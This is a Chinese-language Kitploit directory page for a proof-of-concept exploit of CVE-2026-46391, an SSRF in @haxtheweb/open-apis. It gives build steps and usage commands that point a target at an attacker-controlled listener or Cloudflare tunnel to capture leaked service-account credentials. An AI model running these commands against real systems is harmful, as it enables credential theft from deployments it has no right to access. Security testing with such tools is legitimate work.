Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2026-46391 — CVE-2026-46391 的概念验证利用代码 | Kitploit
工具/GitHubGitHub/bradyjmcl/cve-2026-46391
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubbradyjmcl/cve-2026-46391

cve-2026-46391

CVE-2026-46391 的概念验证利用代码

查看仓库
122个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-46391 - 通过 SSRF 暴露 @haxtheweb/open-apis 中的凭证

test

CVE-2026-46391 的概念验证。触发 @haxtheweb/open-apis 中 cacheAddress 端点的 SSRF 漏洞,并捕获回调中发送的服务账户凭证。

构建

root@kitploit:~
go build -o cve-2026-46391 .

测试

root@kitploit:~
go test ./...

用法

root@kitploit:~
./cve-2026-46391 -u <web根目录> -l <监听地址> [-p 端口] [-t 秒] [-v]

选项

示例

直接连接(与目标在同一网络):

root@kitploit:~
./cve-2026-46391 -u http://10.10.0.80:3000 -l 10.10.15.201

通过 VPS/Cloudflare 隧道等:

root@kitploit:~
./cve-2026-46391 -u http://10.10.0.80:3000 -l https://random-words.trycloudflare.com

自定义端口和超时:

root@kitploit:~
./cve-2026-46391 -u http://10.10.0.80:3000 -l 10.10.15.201 -p 9090 -t 60
下载工具
标志描述默认值
-u, --url目标 Web 根目录(例如 http://10.10.0.80:3000)必需
-l, --listener您的 IP/主机名或隧道 URL(例如 192.168.1.10、https://uuid.trycloudflare.com)必需
-p, --port本地监听端口8080
-t, --timeout等待回调的秒数30
-v, --verbose打印每个入站请求的头部和正文关闭